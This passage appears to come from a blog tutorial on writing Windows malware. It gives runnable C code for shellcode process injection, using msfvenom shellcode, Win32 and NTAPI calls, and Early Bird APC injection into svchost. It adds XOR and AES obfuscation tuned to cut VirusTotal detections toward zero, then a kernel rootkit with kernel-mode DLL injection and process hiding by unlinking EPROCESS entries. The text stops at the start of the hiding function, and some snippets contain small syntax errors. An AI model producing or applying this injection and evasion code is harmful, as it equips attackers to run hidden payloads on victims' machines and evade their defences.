Nevertheless, plaintext Metasploit (msf) shellcode tends to raise red flags and is susceptible to detection by antivirus engines. In the preceding section, we delved into shellcode development, particularly emphasizing a reverse shell. Yet, this code is simpler and can be swiftly pinpointed by antivirus engines. So, let’s explore an alternative strategy how about encoding the shellcode into Read-Write-Execute (RWX) memory to initiate Notepad?

Alright, RWX memory implementation is fairly straightforward for our intended purpose. It involves searching a process’s private virtual memory space (the userland virtual memory space) for a memory section marked as PAGE_EXECUTE_READWRITE. If such a space is found, it’s returned. If not, the next search address is adjusted to the subsequent memory region (BaseAddress + Memory Region).

To finalize this for code execution, our shellcode must then be relocated to that discovered memory region and executed. An efficient way to achieve this is to resort WinAPI calls, similar to what we demonstrated in the first technique. However, it’s essential to consider the drawbacks of that approach, as discussed above.

int main(int argc, char * argv[])  
{  
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c  
    unsigned char shellcode[] =  
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x6e\x6f\x74\x65\x70\x61\x64\x2e\x65\x78\x65\x00";
        
    int newPid = atoi(argv[1]);  
    printf("Injecting into pid %d\n", newPid);  
  
    HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, (DWORD)newPid);  
    if (!pHandle)  
    {  
        printf("Invalid Handle\n");  
        exit(1);  
    }  
    LPVOID remoteBuf = VirtualAllocEx(pHandle, NULL, sizeof(shellcode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
    if (!remoteBuf)  
    {  
        printf("Alloc Fail\n");  
        exit(1);  
    }  
    printf("alloc addr: %p\n", remoteBuf);  
    WriteProcessMemory(pHandle, remoteBuf, shellcode, sizeof(shellcode), NULL);  
    CreateRemoteThread(pHandle, NULL, 0, (LPTHREAD_START_ROUTINE)remoteBuf, NULL, 0, NULL);  
    return 0;  
}

Let’s try to move away from them and directly use the undocumented functions within ntdll.dll in this one we go level lower where we do the syscalls directly.

We need:

NtAllocateVirtualMemory
NtWriteVirtualMemory
NtCreateThreadEx

Since these APIs are not documented by Microsoft, we need to find some external references made by reverse engineers. http://undocumented.ntinternals.net/

Let’s look at the definition of an NTAPI function from the reference link:

NTSYSAPI   
NTSTATUS  
NTAPI  
  
NtAllocateVirtualMemory(  
  
  
  IN HANDLE               ProcessHandle,  
  IN OUT PVOID            *BaseAddress,  
  IN ULONG                ZeroBits,  
  IN OUT PULONG           RegionSize,  
  IN ULONG                AllocationType,  
  IN ULONG                Protect );

NTSTATUS is the actual return value, while NTSYSAPI marks the function as a library import and NTAPI defines the windows api calling convention.

IN means the function requires it as input, while OUT means that the parameter passed in is modified with some return output.

When we prototype the functions, we just need to note the NTAPI part.
In fact you can also use WINAPI since the both of them resolve to __stdcall.

typedef NTSTATUS(NTAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);  
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);  
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);

Here we prototype some function pointers that we’ll map the address of the actual functions in ntdll.dll to later.

You might notice that some types are also missing, for example the POBJECT_ATTRIBUTES, so let’s find and define them from the references.

typedef struct _UNICODE_STRING {  
    USHORT Length;  
    USHORT MaximumLength;  
    PWSTR  Buffer;  
} UNICODE_STRING, *PUNICODE_STRING;  
  
typedef struct _OBJECT_ATTRIBUTES {  
    ULONG           Length;  
    HANDLE          RootDirectory;  
    PUNICODE_STRING ObjectName;  
    ULONG           Attributes;  
    PVOID           SecurityDescriptor;  
    PVOID           SecurityQualityOfService;  
} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES;  
  
typedef struct _PS_ATTRIBUTE {  
    ULONG Attribute;  
    SIZE_T Size;  
    union {  
        ULONG Value;  
        PVOID ValuePtr;  
    } u1;  
    PSIZE_T ReturnLength;  
} PS_ATTRIBUTE, *PPS_ATTRIBUTE;  
  
typedef struct _PS_ATTRIBUTE_LIST  
{  
    SIZE_T       TotalLength;  
    PS_ATTRIBUTE Attributes[1];  
} PS_ATTRIBUTE_LIST, *PPS_ATTRIBUTE_LIST;

Now Let’s load ntdll.dll and map the functions.

HINSTANCE hNtdll = LoadLibraryW(L"ntdll.dll");  
if (!hNtdll)  
{  
    printf("Load ntdll fail\n");  
    exit(1);  
}  
  
NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");  
NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");  
NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");

Finally we can call these functions.

typedef NTSTATUS(NTAPI* NAVM)(HANDLE, PVOID, ULONG, PULONG, ULONG, ULONG);  
typedef NTSTATUS(NTAPI* NWVM)(HANDLE, PVOID, PVOID, ULONG, PULONG);  
typedef NTSTATUS(NTAPI* NCT)(PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, HANDLE, PVOID, PVOID, ULONG, SIZE_T, SIZE_T, SIZE_T, PPS_ATTRIBUTE_LIST);  
  
int main(int argc, char * argv[])  
{  
    // msfvenom -p windows/x64/exec CMD=notepad.exe -f c  
    unsigned char shellcode[] =  
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x6e\x6f\x74\x65\x70\x61\x64\x2e\x65\x78\x65\x00";
     
	int newPid = atoi(argv[1]);  
	printf("Injecting into pid %d\n", newPid);  
  
    HANDLE pHandle = OpenProcess(PROCESS_ALL_ACCESS, 0, (DWORD)newPid);  
    if (!pHandle)  
    {  
        printf("Invalid Handle\n");  
        exit(1);  
    }  
    HANDLE tHandle;  
    HINSTANCE hNtdll = LoadLibraryW(L"ntdll.dll");  
    if (!hNtdll)  
    {  
        printf("Load ntdll fail\n");  
        exit(1);  
    }  
  
    NAVM NtAllocateVirtualMemory = (NAVM)GetProcAddress(hNtdll, "NtAllocateVirtualMemory");  
    NWVM NtWriteVirtualMemory = (NWVM)GetProcAddress(hNtdll, "NtWriteVirtualMemory");  
    NCT NtCreateThreadEx = (NCT)GetProcAddress(hNtdll, "NtCreateThreadEx");  
    void * allocAddr = NULL;  
    SIZE_T allocSize = sizeof(shellcode);  
    NTSTATUS status;  
    status = NtAllocateVirtualMemory(pHandle, &allocAddr, 0, (PULONG)&allocSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);  
    printf("status alloc: %X\n", status);  
    printf("alloc addr: %p\n", allocAddr);  
    status = NtWriteVirtualMemory(pHandle, allocAddr, shellcode, sizeof(shellcode), NULL);  
    printf("status write: %X\n", status);  
    status = NtCreateThreadEx(&tHandle, GENERIC_EXECUTE, NULL, pHandle, allocAddr, NULL, 0, 0, 0, 0, NULL);  
    printf("status exec: %X\n", status);  
  
	return 0;  
}

So, if you decide to upload this to antivirus engines (which I don’t recommend, but the choice is yours), what can you expect? Well, you might see 27 out of 72 detections triggering alarms left and right, screaming ‘MALICIOUS!’ It’s as if the antivirus engines are having a celebration. But here’s the real challenge: we’re striving for a complete absence of detections. We’re not looking for a party, we’re after more stealthy.

Like I said msf shellcode is a give away but let’s Try something else. Time to dust off some classic techniques that never go out of style. We’re diving into XOR encryption, a method you’re probably familiar with when it comes to encrypting shellcode. When XOR encryption is put to work on shellcode, a key is carefully selected to XOR every byte of the shellcode. To decrypt the shellcode, you simply employ the same key to XOR each byte once more, effectively reversing the encryption process and restoring the original shellcode. However, it’s worth noting that XOR encryption can be a walk in the park for attackers who know the key. If you’re up for a challenge, check out the one I posted a while back ReverseMeCipher which involves XOR encryption. Here’s a writeup to give you some insights CipherWriteup As a general rule, it’s often smarter to combine XOR encryption with other methods.

So first we wanna remove strings and debug symbols, Running the command strings on our exe reveals strings such as “NtCreateThreadEx”, which may lead to AV detection.

We can remove these strings by again XOR encrypting them and decrypting during runtime, First we start by the function responsible for encryption and decryption

unsigned char * rox(unsigned char *, int, int);
unsigned char * rox(unsigned char * data, int dataLen, int xor_key)
{
    unsigned char * output = (unsigned char *)malloc(sizeof(unsigned char) * dataLen + 1);

    for (int i = 0; i < dataLen; i++)
        output[i] = data[i] ^ xor_key;

    return output;
}

This Function can be used for encryption and also be used for decryption by applying the same XOR operation. If you XOR the encrypted data with the same xor_key, it will revert to the original data, just formats encrypted shellcode nicely so we can copy and paste, and we only need the encrypt function in our actual injector.

const char* ntdll_str = (const char*)ntdll;
const char* navm_str = (const char*)navm;
const char* nwvm_str = (const char*)nwvm;
const char* ncte_str = (const char*)ncte;

So like we said NtCreateThreadEx." These strings can be indicative of the program’s functionality and may lead to antivirus (AV), One way to obfuscate these strings and make them less detectable is to XOR encrypt them, and then decrypt them during runtime when they are needed.

For example:

unsigned char ntdll_data[] = {0x3d, 0x27, 0x37, 0x3f, 0x3f, 0x7d, 0x37, 0x3f, 0x3f, 0x53};
unsigned char *ntdll = rox(ntdll_data, 10, 0x53);

Let’s use Virustotal again and check the detection rate.

Well, going from 27 detections down to 9 is indeed a notable improvement, but it’s essential to recognize that this level of evasion is still relatively basic, especially when relying on tools like msfvenom to achieve our goals.

Alright time for a new code Injection Technique “Early Bird” This Was used by group goes by APT33 How this works Simply it takes advantage of the application threading process that happens when a program executes on a computer. In other words, attackers inject malware code into legitimate process threads in an effort to hide malicious code inside commonly seen and legitimate processes.

We gone use functions like VirtualAllocEx, WriteProcessMemory, QueueUserAPC, CreateProcessW, and ResumeThread By this time Before injecting the shellcode we a employs an AES decryption routine, The decryption process uses the Cryptography API (CryptAcquireContextW) functions to decrypt the payload using a predefined key.

int AESDecrypt(unsigned char* payload, DWORD payload_len, char* key, size_t keylen) {

HCRYPTPROV hProv;
HCRYPTHASH hHash;
HCRYPTKEY hKey;

BOOL CryptAcquire = CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT);
if (CryptAcquire == false) {
//printf("CryptAcquireContextW Failed: %d\n", GetLastError());
return -1;
}

BOOL CryptCreate = CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash);
if (CryptCreate == false) {
//printf("CryptCreateHash Failed: %d\n", GetLastError());
return -1;
}

  
BOOL CryptHash = CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0);
if (CryptHash == false) {
//printf("CryptHashData Failed: %d\n", GetLastError());
return -1;
}

  

BOOL CryptDerive = CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey);
if (CryptDerive == false) {
//printf("CryptDeriveKey Failed: %d\n", GetLastError());
return -1;
}

  

BOOL Crypt_Decrypt = CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, payload, &payload_len);
if (Crypt_Decrypt == false) {
//printf("CryptDecrypt Failed: %d\n", GetLastError());
return -1;
}

  

CryptReleaseContext(hProv, 0);
CryptDestroyHash(hHash);
CryptDestroyKey(hKey);

return 0;
}

The AES decryption routine ensures that the injected shellcode is in its original, unencrypted form, which is essential for executing it within the target process. This decryption process allows attackers to conceal the true nature of their payload until it is actively executed in the target process’s thread.

Next CreateProcessW

pfnCreateProcessW pCreateProcessW = (pfnCreateProcessW)GetProcAddress(GetModuleHandleW(L"KERNEL32.DLL"), "CreateProcessW");
if (pCreateProcessW == NULL) {
    // Handle error if the function cannot be found
}

STARTUPINFOW si;
PROCESS_INFORMATION pi;

// Clear out startup and process info structures
RtlSecureZeroMemory(&si, sizeof(si));
si.cb = sizeof(si;
RtlSecureZeroMemory(&pi, sizeof(pi));

std::wstring pName = L"C:\\Windows\\System32\\svchost.exe";

HANDLE pHandle = NULL;
HANDLE hThread = NULL;
DWORD Pid = 0;

BOOL cProcess = pCreateProcessW(NULL, &pName[0], NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);

The CreateProcessW function is invoked to create a new process, which, in this case, is intended to execute the svchost.exe application. However, a critical parameter here is CREATE_SUSPENDED, which is set to TRUE, After successfully creating the suspended process, the code retrieves the process and thread handles. These handles are crucial for further manipulation of the newly created process.

pHandle = pi.hProcess;
hThread = pi.hThread;
Pid = pi.dwProcessId;

With the suspended process and its associated handles in place, now we ready to proceed with the code injection, which involves injecting shellcode into the memory space of the newly created process.

Creating a suspended process provides an ideal opportunity to inject code and manipulate the process without raising immediate suspicion.

In the next steps, we will proceed to inject the shellcode into the suspended process, ultimately leading to its execution within the context of the target process’s thread, However Before injecting the shellcode, memory space is allocated within the target process to accommodate the injected code. This allocation is done using the VirtualAllocEx function.

LPVOID memAlloc = pVirtualAllocEx(pHandle, 0, scSize, MEM_COMMIT, PAGE_EXECUTE_READ);

The shellcode, which was previously decrypted, is now written into the allocated memory space within the target process using the WriteProcessMemory function.

DWORD wMem = pWriteProcessMemory(pHandle, (LPVOID)memAlloc, shellcode, scSize, &bytesWritten);

With the shellcode successfully injected into the target process’s memory, the code prepares for its execution. This is done using the QueueUserAPC function, which enqueues the shellcode for execution within the context of a specific thread within the target process.

if (pQueueUserAPC((PAPCFUNC)memAlloc, hThread, NULL)) {
    pResumeThread(hThread);
}

Now, let’s verify the success of our concealment strategy by injecting the shellcode into a suspended process and manipulating the memory space within the context of the process’s thread.

Among the initial 72 detections, we’ve successfully narrowed it down to a mere 5. We commenced with 27 detections, which subsequently decreased to 9, and now we find ourselves with just 5 remaining, and we can keep it going and I’m pretty sure we hit that big zero, This overarching perspective emphasizes the importance of having a diverse array of techniques in your arsenal.

Writing a simple Rootkit

Kernel mode rootkits operate at the most privileged level, known as “Ring 0,” in the computer’s architecture. In contrast, user mode rootkits run at “Ring 3,” which is a lower privilege level.

In order to grasp the workings of kernel mode rootkits, it is essential to have a solid grasp of the basics of Windows device drivers. Essentially, a device driver is a software component responsible for interfacing with hardware and managing Input/Output Request Packets (IRPs).

Writing a Windows Device Driver

Let’s start by building a basic Windows device driver:

#include "ntddk.h"

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    DbgPrint("Hello World!");
    return STATUS_SUCCESS;
}

This simple driver initializes and prints “Hello World!” to the kernel debugger. However, to perform more complex tasks, we need to understand IRPs.

Understanding I/O Request Packets (IRPs)

IRPs are data structures used to communicate between user-mode programs and kernel-mode drivers. When a user-mode program, for example, writes data to a file handle, the kernel creates an IRP to manage this operation.

To process IRPs effectively, a driver must define functions for handling them. In the provided code, we set up a basic dispatch function that completes the IRP with a success status. In reality, different functions would handle various IRP types.

NTSTATUS OnStubDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp)
{
    Irp->IoStatus.Status = STATUS_SUCCESS;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

The driver sets up major function pointers, such as IRP_MJ_CREATE, IRP_MJ_CLOSE, IRP_MJ_READ, IRP_MJ_WRITE, and IRP_MJ_DEVICE_CONTROL, to handle specific IRP types. In a comprehensive driver, separate functions would handle these major functions.

Creating a File Handle

File handles are essential for user-mode programs to interact with kernel drivers. In Windows, to use a kernel driver from user-mode, the user-mode program must open a file handle to the driver. The driver first registers a named device, and then the user-mode program opens it as if it were a file.

const WCHAR deviceNameBuffer[] = L"\\Device\\MyDevice";
PDEVICE_OBJECT g_RootkitDevice; // Global pointer to our device object

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
    NTSTATUS ntStatus;
    UNICODE_STRING deviceNameUnicodeString;

    RtlInitUnicodeString(&deviceNameUnicodeString, deviceNameBuffer);

    ntStatus = IoCreateDevice(DriverObject, 0, &deviceNameUnicodeString, 0x00001234, 0, TRUE, &g_RootkitDevice);
    // ...
}

This code registers a device named “MyDevice.” A user-mode program can open this device using a fully qualified path, e.g., \\\\Device\\MyDevice. This file handle can be used with functions like ReadFile and WriteFile, which generate IRPs for communication.

Understanding the interaction between user-mode and kernel-mode via IRPs and file handles is fundamental to writing effective Windows device drivers, an essential concept in the realm of kernel mode rootkits.

Remember DLL Injection? Now, let’s take a look at how it’s employed by rootkits to inject malicious code or custom device drivers directly into the Windows kernel. In the context of the previously discussed device driver and rootkit concepts, we can explore how kernel-mode DLL injection fits into the picture:

Kernel-Mode DLL

The process typically begins with the DriverEntry function, which is the entry point for our driver. Here’s how we start:

NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverobject, IN PUNICODE_STRING pRegister)
{

NTSTATUS st;
  
PsSetLoadImageNotifyRoutine(&LoadImageNotifyRoutine);

pDriverobject->DriverUnload = (PDRIVER_UNLOAD)Unload;
  
return STATUS_SUCCESS;
}

In this code snippet, we employ the PsSetLoadImageNotifyRoutine function to register an image load notification routine. This step is crucial as it allows us to monitor the loading of specific system DLLs, such as kernel32.dll, into the kernel’s address space.

Additionally, we set the driver’s unload function (pDriverobject->DriverUnload) to handle cleanup operations when the driver is unloaded. This ensures that any resources or callbacks registered during the driver’s lifetime are properly managed.

Image Load Notification

Our monitoring process hinges on image load notifications. We need to identify when the system loads kernel32.dll, a fundamental DLL for Windows operating systems. The LoadImageNotifyRoutine function enables this monitoring.

VOID LoadImageNotifyRoutine(IN PUNICODE_STRING ImageName, IN HANDLE ProcessId, IN PIMAGE_INFO pImageInfo)
{
    if (ImageName != NULL)
    {
        // Check if the loaded image matches the name of kernel32.dll
        WCHAR kernel32Mask[] = L"*\\KERNEL32.DLL";
        UNICODE_STRING kernel32us;
        RtlInitUnicodeString(&kernel32us, kernel32Mask);

        if (FsRtlIsNameInExpression(&kernel32us, ImageName, TRUE, NULL))
        {
            PKAPC Apc;
            
            if (Hash.Kernel32dll == 0)
            {
                // Initialize the Hash structure and import the function addresses
                Hash.Kernel32dll = (PVOID)pImageInfo->ImageBase;
                Hash.pvLoadLibraryExA = (fnLoadLibraryExA)ResolveDynamicImport(Hash.Kernel32dll, SIRIFEF_LOADLIBRARYEXA_ADDRESS);
            }

            // Create an Asynchronous Procedure Call (APC) to initiate DLL injection
            Apc = (PKAPC)ExAllocatePool(NonPagedPool, sizeof(KAPC));
            if (Apc)
            {
                KeInitializeApc(Apc, KeGetCurrentThread(), 0, (PKKERNEL_ROUTINE)APCInjectorRoutine, 0, 0, KernelMode, 0);
                KeInsertQueueApc(Apc, 0, 0, IO_NO_INCREMENT);
            }
        }
    }
    return;
}

The LoadImageNotifyRoutine function plays a pivotal role in our DLL injection process. It checks if the ImageName parameter is not NULL, ensuring that we are actively monitoring loaded images with names. Furthermore, we examine if the loaded image matches the name of kernel32.dll.

If a match is found, we proceed with initializing the Hash structure and creating an Asynchronous Procedure Call (APC) using the APCInjectorRoutine. The APC serves as a mechanism to trigger the DLL injection process into a target process.

These code snippets are instrumental in monitoring and responding to the loading of kernel32.dll and lay the groundwork for our upcoming discussion on kernel-mode DLL injection.

Unloading the Driver

Before we dive deeper into DLL injection, it’s essential to understand how the driver can be unloaded properly. We accomplish this using the Unload function.

VOID Unload(IN PDRIVER_OBJECT pDriverobject)
{
    // Remove the image load notification routine
    PsRemoveLoadImageNotifyRoutine(&LoadImageNotifyRoutine);
}

Here, we use the PsRemoveLoadImageNotifyRoutine function to unregister the previously registered image load notification routine. This step ensures that we can gracefully clean up and stop monitoring loaded images when the driver is unloaded.

DLL Injection

Our exploration of kernel-mode DLL injection is incomplete without understanding how the actual injection takes place. The DllInject function is the key to achieving this.

NTSTATUS DllInject(HANDLE ProcessId, PEPROCESS Peprocess, PETHREAD Pethread, BOOLEAN Alert)
{
    HANDLE hProcess;
    OBJECT_ATTRIBUTES oa = { sizeof(OBJECT_ATTRIBUTES) };
    CLIENT_ID cidprocess = { 0 };
    CHAR DllFormatPath[] = "C:\\foo.dll";
    ULONG Size = strlen(DllFormatPath) + 1;
    PVOID pvMemory = NULL;

    cidprocess.UniqueProcess = ProcessId;
    cidprocess.UniqueThread = 0;

    // Open the target process
    if (NT_SUCCESS(ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &oa, &cidprocess)))
    {
        // Allocate virtual memory in the target process
        if (NT_SUCCESS(ZwAllocateVirtualMemory(hProcess, &pvMemory, 0, &Size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE)))
        {
            // Create an APC (Asynchronous Procedure Call) to load the DLL
            KAPC_STATE KasState;
            PKAPC Apc;

            // Attach to the target process
            KeStackAttachProcess(Peprocess, &KasState);

            // Copy the DLL path to the target process's memory
            strcpy(pvMemory, DllFormatPath);

            // Detach from the target process
            KeUnstackDetachProcess(&KasState);

            // Allocate memory for the APC
            Apc = (PKAPC)ExAllocatePool(NonPagedPool, sizeof(KAPC));
            if (Apc)
            {
                // Initialize the APC with the appropriate routine and parameters
                KeInitializeApc(Apc, Pethread, 0, (PKKERNEL_ROUTINE)APCKernelRoutine, 0, (PKNORMAL_ROUTINE)Hash.pvLoadLibraryExA, UserMode, pvMemory);

                // Insert the APC into the thread's queue
                KeInsertQueueApc(Apc, 0, 0, IO_NO_INCREMENT);
                return STATUS_SUCCESS;
            }
        }
        // Close the target process handle
        ZwClose(hProcess);
    }

    return STATUS_NO_MEMORY;
}

The DllInject function serves the critical role of injecting a DLL into a target process in kernel mode. It accepts several parameters, including the ProcessId of the target process, the PEPROCESS structure of the target process (Peprocess), the PETHREAD structure of the target process (Pethread), and a Boolean value indicating whether alertable I/O is allowed (Alert).

The injection process begins with the opening of the target process using ZwOpenProcess. This step grants us access to the target process with full privileges.

Subsequently, we allocate virtual memory within the target process using ZwAllocateVirtualMemory. This allocated memory will be used to store the path to the DLL that we intend to inject.

To safely write data into the target process’s memory, we attach to the target process using KeStackAttachProcess. This attachment is crucial for the integrity and safety of the DLL injection process.

With the attachment in place, we copy the path of the DLL to be injected into the allocated virtual memory within the target process. This path is defined in the DllFormatPath variable.

After successfully copying the DLL path, we detach from the target process using KeUnstackDetachProcess.

The heart of the DLL injection lies in the creation of an Asynchronous Procedure Call (APC). This is accomplished by allocating memory for the APC using ExAllocatePool. The APC is initialized with the necessary routine and parameters.

The Apc structure is initialized using KeInitializeApc.
The parameters include the target thread (Pethread) and an APC routine (APCKernelRoutine) responsible for loading the DLL.
Additionally, the normal routine is specified as Hash.pvLoadLibraryExA to load the DLL using LoadLibraryExA from kernel32.dll.
The APC is inserted into the thread’s queue with KeInsertQueueApc.

To ensure that DLL injection occurs in a controlled and synchronized manner, we rely on the SirifefWorkerRoutine and APCInjectorRoutine functions.

VOID SirifefWorkerRoutine(PVOID Context)
{
    DllInject(((PSIRIFEF_INJECTION_DATA)Context)->ProcessId, ((PSIRIFEF_INJECTION_DATA)Context)->Process, ((PSIRIFEF_INJECTION_DATA)Context)->Ethread, FALSE);
    KeSetEvent(&((PSIRIFEF_INJECTION_DATA)Context)->Event, (KPRIORITY)0, FALSE);
    return;
}

The SirifefWorkerRoutine function acts as a worker routine responsible for triggering the DLL injection. It accepts a single Context parameter.

Within this function, the actual DLL injection is initiated by calling the DllInject function. The parameters provided include the target process’s ID, the process’s EPROCESS structure, and the process’s ETHREAD structure. The final parameter, FALSE, indicates that alertable I/O is not allowed.

Once the DLL injection process completes, an event (KeSetEvent) is set to signal the successful injection. This event allows us to synchronize the completion of the injection process with other parts of the code.

DLL Injection via APC

The initiation of DLL injection takes place within the APCInjectorRoutine function, The APCInjectorRoutine function serves as the orchestrator for our DLL injection process. It commences by initializing a SIRIFEF_INJECTION_DATA structure, Sf, and scheduling a worker thread (SirifefWorkerRoutine) to perform the injection.

VOID NTAPI APCInjectorRoutine(PKAPC Apc, PKNORMAL_ROUTINE *NormalRoutine, PVOID *SystemArgument1, PVOID *SystemArgument2, PVOID* Context)
{
    SIRIFEF_INJECTION_DATA Sf;

    RtlSecureZeroMemory(&Sf, sizeof(SIRIFEF_INJECTION_DATA));
    ExFreePool(Apc);

    // Initialize the SIRIFEF_INJECTION_DATA structure with the necessary information
    Sf.Ethread = KeGetCurrentThread();
    Sf.Process = IoGetCurrentProcess();
    Sf.ProcessId = PsGetCurrentProcessId();

    // Initialize an event to synchronize the DLL injection
    KeInitializeEvent(&Sf.Event, NotificationEvent, FALSE);

    // Initialize a work item to execute the SirifefWorkerRoutine
    ExInitializeWorkItem(&Sf.WorkItem, (PWORKER_THREAD_ROUTINE)SirifefWorkerRoutine, &Sf);

    // Queue the work item to be executed on the DelayedWorkQueue
    ExQueueWorkItem(&Sf.WorkItem, DelayedWorkQueue);

    // Wait for the DLL injection to complete
    KeWaitForSingleObject(&Sf.Event, Executive, KernelMode, TRUE, 0);

    return;
}

These routines work together to schedule and execute the DLL injection into the target process after the kernel32.dll module is loaded. This injection is performed in a controlled and synchronized manner, ensuring that the target process is injected with the specified.

Hide Process

A interesting technique we can use in our rootkit is to hide or unlink a target process, which will be hidden from AVs, We won’t be able to see this in the Windows Task Manager.

To hide our process we need to understand a few Windows internal concepts, such as the EPROCESS data structure in the Windows kernel. EPROCESS is an opaque data structure in the Windows kernel that contains important information about processes running on the system. The offsets of this large structure change from build to build or version to version.

What we’re interested in is, ActiveProcessLinks, which is a pointer to a structure called LIST_ENTRY. We can’t just access this data structure normally like EPROCESS.ActiveProcessLinks, we have to use PsGetCurrentProcess to get the current EPROCESS and then add an offset that is version dependent. This is the downside to the EPROCESS structure. It can make it very hard to have a compatible Windows Kernel rootkit.

kd> dt nt!_EPROCESS
<..redacted...>
    +0x000 Pcb              : _KPROCESS
    +0x3e8 ProcessLock      : _EX_PUSH_LOCK
    +0x2f0 UniqueProcessId  : Ptr64 Void
    +0x400 ActiveProcessLinks : _LIST_ENTRY

The LIST_ENTRY data structure is a doubly-linked list, where FLINK (forward link) and BLINK are references to the next and previous elements in the doubly-linked list.

Using the information above, we can hide our process from being shown by manipulating the kernel data structures. To hide our process we can do the following:

Point the ActiveProcessLinks.FLINK of EPROCESS 1 to ActiveProcessLinks.FLINK of EPROCESS 3 .
Point ActiveProcessLinks.BLINK of EPROCESS 3 to ActiveProcessLinks.BLINK OF EPROCESS 1.

This manipulation unlinks the data structure of our target process, EPROCESS 2, from the doubly-linked list, rendering it invisible to system inspectors.

// Function to hide a process by manipulating kernel data structures
NTSTATUS HideProcess(ULONG pid) {
